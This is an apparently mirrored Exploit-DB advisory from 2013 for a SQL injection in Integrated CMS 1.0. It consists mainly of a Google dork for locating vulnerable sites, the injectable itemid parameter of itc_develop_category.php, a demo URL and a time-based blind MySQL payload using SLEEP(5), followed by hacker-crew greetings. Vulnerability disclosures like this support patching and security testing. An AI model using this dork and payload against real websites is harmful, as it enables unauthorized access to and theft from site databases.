Integrated CMS 1.0 – SQL Injection - 体验盒子

作者： DSST

日期： 2013-08-12

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/27525/

==========================================================================================================
[/]#~Exploit Title : Integrated CMS Saudi SQL Injection
[\]
[/]#~Exploit Author : DSST
[\]
[/]#~Vendor Home Page : in2sol.com
[\]
[/]#~Tested on: Windows 7,GNU/Linux,Windows XP,Windows 8
[\]
[/]#~Google Dork: inurl:itc_develop_category.php?itemid=
[\]
[/]#~Version : 1
[\]
==========================================================================================================
[/]@~Location : /itc_develop_category.php?itemid=[SQL]
[\]
[/]@~Demo 1:http://server/itc_develop_category.php?itemid=10%27
[\]
[\]
[\]@~Exploit-DB Note:
 Type: AND/OR time-based blind
 Title: MySQL > 5.0.11 AND time-based blind
 Payload: itemid=1 AND SLEEP(5)
==========================================================================================================
[/] D!sc0v3r3d by : Mr.Killer , Mr.EpSiLoN
[\]
[/] Greetz: |SILENT -SAJJAD13AND11-CRACK3R-HELL BOY-MR.BAD_JENS
[\]
[/] MEDRIK-HOTON -JJHACKER - GAME OVER !- IRIST-MR.HESAAM-Bl4ck C0d3R
[\]
[/] Explo!ter-Omid.Hacker-_Ali_-Beni_Vanda-D4?Kness 0w1-And All MemberR -|
[\]
==========================================================================================================